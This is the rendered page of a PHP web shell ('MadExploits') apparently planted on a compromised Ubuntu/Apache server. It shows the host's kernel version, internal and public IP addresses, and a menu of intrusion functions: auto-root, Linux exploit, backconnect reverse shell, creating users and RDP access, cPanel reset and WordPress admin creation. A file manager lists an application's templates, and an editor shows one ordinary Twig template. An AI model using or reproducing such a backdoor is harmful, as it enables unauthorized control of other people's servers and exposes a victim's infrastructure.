Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.191.142.102
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz2 /
templates /
loading /
[ HOME SHELL ]
Name
Size
Permission
Action
cargos.html.twig
1.41
KB
-rw-rw-r--
depot.html.twig
2.35
KB
-rw-rw-r--
edit.html.twig
2.45
KB
-rw-rw-r--
index.html.twig
1.6
KB
-rw-rw-r--
list.html.twig
1.66
KB
-rw-rw-r--
load.html.twig
9.24
KB
-rw-rw-r--
search.html.twig
0
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : depot.html.twig
{% extends 'base2.html.twig' %} {% block style %} {{ parent() }} <link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-beta.1/dist/css/select2.min.css" rel="stylesheet" /> <style> .card { padding: 20px; } .form-control.select2 { height: 40px; } .select2-container .select2-selection--single { height: inherit; } .check-in { display: flex; height: 45px; align-items: center; } .check-in h4 { padding-right: 10px; } </style> {% endblock %} {% block content %} <div class="content"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> <div class="card"> {% if checkin %} <h3>Checked in</h3> <div class="check-in"> <h4>{{ checkin[0].name }}</h4> <a href="{{ path('checkout', {'id': checkin[0].id}) }}" class="btn btn-danger">Checkout</a> </div> {% else %} <form action="{{ path('checkin') }}" method="post" class="form-inline"> <div class="header"> <h4>Check in to Depot</h4> </div> <div> <select class="form-control select2" name="depot"> <option value="">Select Depot</option> {% for depot in depots %} <option value="{{ depot.id }}">{{ depot.name }}</option> {% endfor %} </select> <button class="btn btn-default">Check In</button> </div> </form> {% endif %} </div> </div> </div> </div> </div> {% endblock %} {% block javascript %} {{ parent() }} <script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-beta.1/dist/js/select2.min.js"></script> <script> $('.select2').select2(); </script> {% endblock %}
Close